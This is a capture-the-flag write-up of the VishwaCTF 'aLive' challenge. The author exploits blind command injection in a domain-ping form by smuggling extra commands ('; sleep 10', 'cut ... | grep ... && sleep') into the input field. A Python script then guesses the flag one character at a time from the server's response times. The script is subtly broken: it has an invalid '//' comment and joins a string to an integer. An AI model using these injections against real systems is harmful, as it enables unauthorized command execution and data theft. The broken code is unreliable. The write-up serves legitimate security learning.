(Write-up) Vishwactf: aLive
(Write-up) Vishwactf: aLive

(Write-up) Vishwactf: aLive

💻Problem

We have been provided with a link to website that receives the flag.
The site looks like this:
notion image
It’s very simple, right? 😈

🤔Examine

I tried entering google.com as the example they suggested and the results was like this:
notion image
It’s look so simple too 😗
Okay, let’s move on, I think if it looks as simple as this then maybe it contains the ping command inside the backend (where we can’t see it). ⇒ If that’s true, maybe it contains CMDi (Command Injection) ⇒ We can exploit.
So, I tried entering google.com; sleep 10 .
Ohhh, the website took 10 seconds to response. ⇒ The hypothesis was correct
I guess the flag will be stored inside a file on the system, and our mission is to find a way to get it.
But, we have no place to display the output on this website. So what do I do?(Let us deal with this in the next part)
Ok, through this, I will use it to exploit this FLAG.

🚩Let’s go

For starters, I'm assuming the file flag will be in the current directory.
Ok, back to the problem of not showing output. To solve this problem we tried using CURL, but we failed, it seems the internet has been banned.
So, we thought about using the sleep command to brute force flag.
Because the flag's form is in the form of VishwaCTF, I tried 
google.com; cut -c1-9 * | grep "VishwaCTF" && sleep 10
This command has been executed, the website took 10 seconds to respond, so the file containing the correct flag is located in the current directory.
So we wrote a python program to be able to brute force flag
from requests import post

URL = "<URL>" // Change URL

timeSleep = 1

flag = ""
currentChar = 48
index = 1

while(True):
    if(currentChar in range(48, 59) or currentChar in range(65, 91) or currentChar in range(97, 124) or currentChar == 125 or currentChar == 95 ):
        tar = 'google.com; cut -c1-' + str(index) + ' * | grep "' + flag + chr(currentChar) + '" && sleep ' + timeSleep
        res = post(URL, data = {"domain": tar})
        if(res.elapsed.total_seconds() <= timeSleep):
            currentChar += 1
        else:
            flag += chr(currentChar)
            print(flag)
            currentChar = 48
            index += 1
    elif(currentChar > 128):
        break
    else:
        currentChar += 1

print("==> Flag: " + flag)
(The above code was written from someone who is still inexperienced and has not been optimized, you can optimize it for better 😝)
Run the above code and … Waiting is happiness!!!
💡 VishwaCTF{b1inD_cmd}
 

Loading Comments...